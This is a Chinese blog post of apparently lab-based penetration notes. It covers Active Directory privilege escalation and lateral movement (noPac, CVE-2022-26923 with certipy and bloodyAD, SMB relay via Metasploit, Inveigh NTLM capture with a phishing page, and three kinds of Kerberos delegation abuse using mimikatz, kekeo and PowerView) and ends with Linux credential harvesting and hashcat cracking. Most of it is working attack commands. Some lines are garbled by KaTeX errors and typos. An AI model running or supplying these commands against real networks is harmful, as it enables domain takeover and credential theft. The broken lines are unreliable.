内网渗透小结(1)，作为一个Linux运维开发者

最新推荐文章于 2024-08-09 10:53:56 发布

程序员云养猫

最新推荐文章于 2024-08-09 10:53:56 发布

阅读量1k

点赞数 27

分类专栏： 2024年程序员学习文章标签： linux 运维开发运维

本文链接：https://blog.csdn.net/m0_60635176/article/details/137532786

版权

2024年程序员学习专栏收录该内容

255 篇文章 0 订阅

订阅专栏

前提条件:一个域内普通账号
影响版本:windows基本全系列
https://github.com/cube0x0/noPac
https://learn.microsoft.com/zh-cn/sysinternals/downloads/pstools
前置:
1、代理后:
修改nost绑定域名和IP
2、扫描探针:
noPac scan -domain god.org -user webadmin -pass admin!@#45
3、利用连接:
noPac -domain god.org -user webadmin -pass admin!@#45 /dc owa2010cn-god.god.org /mAccount dadd /mPassword sdadasdsa /service cifs /ptt
PsExec owa2010cn-god.god.org cmd

CVE-2022-26923

当windows系统的Active Directory证书服务(cs)在域上运行时，由于机器账号中的**dNSHostName属性不具有唯一性**，域中普通用户可以将其更改为高权限的域控机器账号属性，然后从Active Directory证书服务中获取域控机器账户的证书，导致域中普通用户权限提升为域管理员权限。
简单来说就是创造一个机器账号，伪装成域控
导向:win8.1、win10、win11、Winserver2012R2、Winserver2016、Winserver2019、Winserver2022等版本
前提条件:
1、一个域内普通账生
2、域内存在证书服务器
kali添加访问域内信息 /etc/hosts
192.168.1.15 xiaodi.local
192.168.1.15 xiaodi-WIN-3C7S8328Q6R-CA
192.168.1.15 WIN-3C75532806R.xiaodi.local

获取CA结构名和计算机名
certutil -config - -ping
域内信息
192.168 1.15
test pass123
xiaodi-WIN-3C7SS323Q6R-CA
WIN-3C75532506R.xiaodi.local(域控)

1、申请低权限用户证书:
certipy req ‘xiaodi.local/test:Pass123@WIN-3C75832806R.xiaodi.local’ -ca xiaodi-WIN-3C78832806R-CA -template User -debug
2、检测证书
certipy auth -pfx test.pfx
3、创建一个机器账户:
python3 bloodyAD.py -d xiaodi local -u test -p ‘a33123’ --host 192.168.1.15 addComputer pwnmachine ‘CVEPassword1234*’
4、设置机器账户属性(dNSHostName和DC一致):
python3 bloodyAD.py -d xiaodi.local -u test -p ‘Pass123’ --host 192.168.1.15 setAttribute ‘CN=pwnmachine,cN=Computer3,DC=xiaodi,DC=local’ dNSHostName ‘[“WIN-3C78532506R.xiaodi.local”]’
5、再次申请证书:
certipy red
‘xiaodi.local/pwnmachine$:CVEPassword1234*@192 168.1.15’ -template Machine -dc-ip 192.168.1.15 -ca xiaodi-WIN-3C755325Q6R-CA
6、检测证书:
certipy auth pfx ./win-3c733323q6r.pfx -dc-ip 192.168.1.15
7、导出域控主机中所有hash:(impacket套件)
python3 secretsdump.py ‘xiaodi.local/win-3078832806r5WIN-3C758328068.xiaodi.local’ -hashs :10e026ef2258ad96239e2281a01827a4
8、利用HASH:
pth

10.SMB重放

dir \192.168.x.x/c$
原理：使用smb通讯时，默认使用**当前**的账号密码连接
域用户mary jack，本地用户administrator等
一般重放本地system用户或administrator用户来进行横向移动

条件：通讯双方当前用户密码一致

MSF:
后门上线
添加路由：
run autoroute -p //查看当前路由表
run post/multi/manage/autoroute //添加当前路由表
backgroup //返回
重发模块：
use exploit/windows/smb/smb_relay
set smbhost 192.168.46.135 //转发攻击目标
set lhost 192.168.46.166 //设置本地 IP
set autorunscript post/windows/manage/migrate
主动连接：
set payload windows/meterpreter/bind_tcp
set rhost 192.168.3.X //设置连接目标
run

11.Inveigh 嗅探-Hash 破解

条件：一台域主机的管理员权限
Responder 中继攻击-NTLM Hash 破解
https://github.com/hashcat/hashcat/
https://github.com/Kevin-Robertson/Inveigh
1、监听拦截
Inveigh.exe
获取到的是 NET NTLM HASH V1 或 V2
2、触发拦截
dir \192.168.3.x\c$
2.1、配合钓鱼，内网主机开启建议http服务
触发http://192.168.3.31/1.html

<!DOCTYPE html>
<html>
<head>
  <title></title>
</head>
<body>
  <img src="https://i-blog.csdnimg.cn/blog_migrate/8cc47ff9660f0fbae913a31d6c20a1a8.png">
</body>
</html>

3.hashcat破解监听到的hash

12.非约束委派&约束委派&资源约束委派

委派攻击总结：
约束委派：首先判断委派的第二个设置，然后看针对用户，后续钓鱼配合
非约束委派：首先判断委派的第三个设置，然后看针对用户，主动攻击
资源约束委派：只看 DC 是不是 2012 及以上帮版本，然后看针对用户，主动攻击
参考：https://xz.aliyun.com/t/11555

非约束委派

原理：
机器 A（域控）访问具有非约束委派权限的机器 B 的服务，会把当前认证用户（域管用
户）的的 TGT 放在 ST 票据中，一起发送给机器 B，机器 B 会把 TGT 存储在 lsass 进程
中以备下次重用。从而机器 B 就能使用这个 TGT 模拟认证用户（域管用户）访问服务。

利用场景
攻击者拿到了一台配置非约束委派的机器权限，可以诱导域管来访问该机器，然后得到管
理员的 TGT，从而模拟域管用户。

复现配置：
1、信任此计算机来委派任何服务
2、setspn -U -A priv/test webadmin

判断查询：

查询域内设置了非约束委派的服务账户：
AdFind -b “DC=god,DC=org” -f “(&(samAccountType=805306368 (userAccountControl:1.2.840.113556.1.4.803:=524288))” dn
查询域内设置了非约束委派的机器账户:
AdFind -b “DC=god,DC=org” -f “(&(samAccountType=805306369)(userAccountControl:1.2.840.113556.1.4.803:=524288))” dn

利用步骤：
1、域控与委派机器通讯
主动：
net use \webserver
钓鱼：
http://192.168.3.31/31.html

2、导出票据到本地
mimikatz sekurlsa::tickets /export
3、导入票据到内存
mimikatz kerberos::ptt [0;fece8]-2-0-60a00000-Administrator@krbtgt-GOD.0RG.kirbi
4、连接通讯域控
dir \owa2010cn-god\c$

约束委派

原理:
由于非约束委派的不安全性，微软在windowsservex2003中引入了约束委派，对Kerberos协议进行了拓展，引入了Service for User to Self(S4U2self)和Service for User to Proxy(S4U2proxy)。

利用场景:
如果攻击者控制了服务A的账号，并且服务A配置了到域控的CIFS服务的约束性委派。则攻击者可以先使用S4U2self申请域管用户(administrator)访问A服务的ST1，然后使用S4U2proxy 以administrator身份访问域控的CIFS服务，即相当于控制了域控。

复现配置:
1、主机设置仅信任此计算机指定服务-cifs
2、用户设置仅信任此计算机指定服务-cifs

1、判断查询
查询机器用户(主机)配置约束委派
AdFind -b “DC=god,DC=org” -f “((samAccountType=805306369)(msds-allowedtodelegateto=*))” msds-allowedtodelegateto
查询服务账户(主机)配置约束委派
AdFind -b “DC=god,DC=org” -f “((samAccountType=805306368)(msds-allowedtodelegateto=*))” msds-allowedtodelegateto
2、利用用户票据获取域控票据
kekeo “tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi
/user:Administrator@god.org /service:cifs/owa2010cn-god” “exit”
kekeo “tgs::s4u /tgt:TGT_webadmin@GOD.ORG_krbtgt~god.org@GOD.ORG.kirbi /user:Administrator@god.org /service:cifs/owa2010cn-god.god.org” “exit”
3、导入票据到内存
mimikatz kerberos::ptt TGS_Administrator@god.org@GOD.ORG_cifs~owa2010cn-god.god.org@GOD.ORG.kirbi
4、连接通讯域控
shell dir \owa2010cn-god.god.org\c$

资源约束委派

基于资源的约束委派(RBCD)是在windows server 2012中新加入的功能，与传统的约束委派相比，它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身，既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。

-》计算机加入域时，加入域的域用户被控后也将导致使用当前域用户加入的计算机受控。

条件:
1、域控windows2012及以上
2、多台主机由一个域用户加入域

获取受害目标:看有哪些主机是由一个域用户加入域的,是否有相同sid值
AdFind.exe -h 192.168.3.33 -b “DC=xiaodi,DC=local” -f “objectClass=computer” ms-DS-CreatorSID
S-1-5-21-1695257952-3088263962-2055235443-1104
判断受害用户是谁:
sid2user.exe \192.168.3.33 5 21 1695257952 3088263962 2055235443 1104

增加机器:
https://github.com/Kevin-Robertson/Powermad
Set-ExecutionPolicy Bypass -Scope Process
Import-Module .\Powermad.ps1
New-MachineAccount -MachineAccount serviceA -Password $(ConvertTo-SecureString “123456” -AsPlainText -Force)

获取sid:
https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/PowerView.ps1
Import-Module .\PowerView.ps1
Get-NetComputer serviceA -Properties objectsid
S-1-5-21-1695257952-3088263962-2055235443-1107

设置修改属性：
powershell
Set-ExecutionPolicy Bypass -Scope Process
import-module .\powerview.ps1
$SD=New-Obiect Security.AccessControl.RawSecurityDescriptor -ArgumentList “O:BAD:(A;;CCDCLCSWREWPDTLOCRSDRCWDWO;;;S-1-5-21-1695257952-3088263962-2055235443-1107)”
$S D B y t es = N e w - O bj ec t b y t e [] ($ SD.BinaryLength)
$S D . G e tB ina ry F or m ($ SDBytes, 0)
Get-DomainComputer DATA| Set-DomainObject -Set @{‘msds-allowedtoactonbehalfofotheridentity’=$SDBytes}’ -Verbose

data是一个主机名

验证修改是否成功:
Get-DomainComputer DATA -Properties msds-allowedtoactonbehalfofotheridentity
清除修改设置:
Set-DomainObject DATA -Clear ‘msds-allowedtoactonbehalfofotheridentity’ -Verbose

连接目标获取票据
python getST.py -dc-ip 192.168.3.33 xiaodi.local/serviceA $KaTeX parse error: Expected group as argument to '\c' at end of input: ….xiaodi.local\c$
python psexec.py -k xiaodi.local/administrator@data.xiaodi.local -no-pass

linux

1.SSH协议

信息收集密码，密钥，然后横向

~/.ssh/config
~/.ssh/known_hosts
~/.bash_history
history

cat /etc/passwd
cat /etc/shadow

hash破解
hashcat.exe -a 3 -m 1800 linuxhash.txt pass.txt
加密形式：
linux sha512crypt $6$ , SHA512 (Unix)加密方式：
hashcat -m 1800 sha512linux.txt p.txt
linux sha256crypt $5$ , SHA256 (Unix)加密方式：
hashcat -m 7400 sha256linux.txt p.txt
linux 下 md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)加密方式：
hashcat -m 500 linuxmd5.txt p.txt
inux 下 bcrypt $KaTeX parse error: Undefined control sequence: \* at position 2: 2\̲*̲$ , Blowfish 加密方式：
hashcat -m 3200 linuxmd5.txt p.txt